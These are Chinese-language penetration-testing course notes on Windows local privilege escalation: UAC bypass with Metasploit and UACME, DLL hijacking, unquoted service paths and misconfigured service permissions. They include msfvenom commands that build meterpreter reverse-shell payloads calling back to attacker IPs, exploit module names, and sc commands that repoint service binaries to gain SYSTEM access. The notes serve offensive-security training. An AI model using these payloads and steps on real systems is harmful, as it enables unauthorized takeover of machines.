第102天：权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限

知识点梳理

#知识点：
1、BypassUAC&Dll劫持
2、不安全服务&引号路径

#截至目前思路点总结如下：
1.提权方法有部分适用在不同环境，当然也有通用方法
2.提权方法也有操作系统版本区分，特性决定方法利用面
3.提权方法有部分需要特定环境，如数据库,第三方提权等

#截至目前思路点总结如下：
1.提权方法有部分适用在不同环境，当然也有通用方法
2.提权方法也有操作系统版本区分，特性决定方法利用面
3.提权方法有部分需要特定环境，如数据库,第三方提权等

#思考点：
1、如何判断采用什么数据库提权？
2、数据库提权首要条件密码获取？
3、有那些数据库类型可以进行提权？
4、操作系统在数据库提权中有那些疑问？

#章节点：
1、Web权限提升
2、系统权限提升
3、域控权限提升

#详细点：
1、具体有哪些权限需要我们了解掌握的？
后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等

2、以上常见权限获取方法简要归类说明？
后台权限：SQL注入,数据库备份泄露，默认或弱口令等获取帐号密码进入
网站权限：后台提升至网站权限，RCE或文件操作类、反序列化等漏洞直达Shell
数据库权限：SQL注入,数据库备份泄露，默认或弱口令等进入或网站权限获取后转入
接口权限：SQL注入,数据库备份泄露，源码泄漏，培植不当等或网站权限获取后转入
系统权限：高危系统漏洞直达或网站权限提升转入、数据库权限提升转入，第三方转入等
域控权限：高危系统漏洞直达或内网横向渗透转入，域控其他服务安全转入等

3、以上常见权限获取后能操作的具体事情?
后台权限:
常规WEB界面文章分类等操作，后台功能可操作类
网站权限：
查看或修改程序源代码，可以进行网站或应用的配置文件读取（接口配置信息，数据库配置信息等），还能收集服务器操作系统相关的信息，为后续系统提权做准备。
数据库权限：
操作数据库的权限，数据库的增删改等，源码或配置文件泄漏，也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。
接口权限：
后台或网站权限后的获取途径：后台（修改配置信息功能点），网站权限（查看的配置文件获取），具体可以操作的事情大家自己想想。
系统权限：如同在你自己操作自己的电脑一样
域控权限：如同在你自己操作自己的虚拟机一样

演示案例

Win7&10-BypassUAC自动提权-MSF&UACME

Win2012-DLL劫持提权应用配合MSF-FlashFXP

Win2012-不带引号服务路径配合MSF-MacroExpert

Win2012-不安全的服务权限配合MSF-NewServices

#Win7&10-BypassUAC自动提权-MSF&UACME
为了远程执行目标的exe或者bat可执行文件绕过此安全机制，以此叫BypassUAC
绕过项目：MSF内置，Powershell渗透框架，UACME项目(推荐)
开启UAC和未开启UAC时,MSF默认getsystem提权影响(进程注入)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.46.158  lport=3333 -f exe -o msf.exe
1、MSF模块：
-Test in Win7 本地电脑 本地权限
use exploit/windows/local/bypassuac
-Test in Win10 本地电脑 本地权限
use exploit/windows/local/ask（这个很弱智，要对方点击确认）
use exploit/windows/local/bypassuac_sluihijack
use exploit/windows/local/bypassuac_silentcleanup

2、UACME项目：
https://github.com/hfiref0x/UACME
Akagi64.exe 41 msf1.exe
Akagi64.exe 编号 调用执行
（这个项目比较好用的模块有 23、61、41，实测61可以搞win11提升system权限）

#Win2012-DLL劫持提权应用配合MSF-FlashFXP
原理：Windows程序启动的时候需要DLL。如果这些DLL 不存在，则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常，Windows应用程序有其预定义好的搜索DLL的路径，它会根据下面的顺序进行搜索：
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory，CWD
6、在PATH环境变量的目录（先系统后用户）
注意：一般DLL劫持的是当前工作目录的dll文件

过程：信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功
检测： ChkDllHijack、火绒剑
（火绒剑用于分析程序运行会调用哪些dll文件，ChkDllHijack用于检测某个dll文件是否可以劫持，但实际我测试没有卵用，直接劫持替换就行了）
项目：https://github.com/anhkgg/anhkgg-tools
利用火绒剑进行进程分析加载DLL，一般寻程序DLL利用。
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117  lport=4444 -f dll -o xiaodi.dll
提前信息收集相关软件及DLL问题程序，本地调试成功后覆盖DLL实现利用

#Win2012-不带引号服务路径配合MSF-MacroExpert
原理：比如 C:\Program Files (x86)\Acunetix\wvs_supervisor.exe 这个服务（以Admin身份运行），
		   若存在 C:\Program.exe ，那服务启动时会识别成 "文件+参数" 的形式，
		   所以将生成的木马放到 C:\Program.exe 下，那么服务启动时，木马 C:\Program.exe 也会以Admin身份运行
过程：检测可利用的不带引号服务路径 - 上传反弹exe并设置好对应执行名 - 启动对应服务
方法1、检测脚本：JAWS （直接powershell执行 ./jaws-enum.ps1就可以检测出来）
https://github.com/411Hall/JAWS
方法2、检测命令cmd执行：wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
（最后启动服务：sc start "服务名"）
实测：JAWS可能跑不出来，方法2的命令可以，但需要一定权限。

#Win2012-不安全的服务权限配合MSF-NewServices
原理：即使正确引用了服务路径，也可能存在其他漏洞。
		   由于管理配置错误，用户可能对服务拥有过多的权限，
		   例如，可以直接修改服务binPath所指向的执行文件。
过程：检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功
检测脚本：accesschk、PowerUp(PowerSploit)
https://github.com/PowerShellMafia/PowerSploit
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
方法1、检测脚本：accesschk.exe -uwcqv "administrators" *
方法1、检测脚本：Import-Module .\PowerUp.ps1
步骤：
Invoke-All Checks
sc create "test" binPath="C:\1.exe"	//创建一个test服务用于测试
sc config "test" binpath="C:\Program.exe"	//修改test服务的binpath
sc start test	//启动test服务，看msf那边反弹shell

补充

关于不带引号服务路径的补充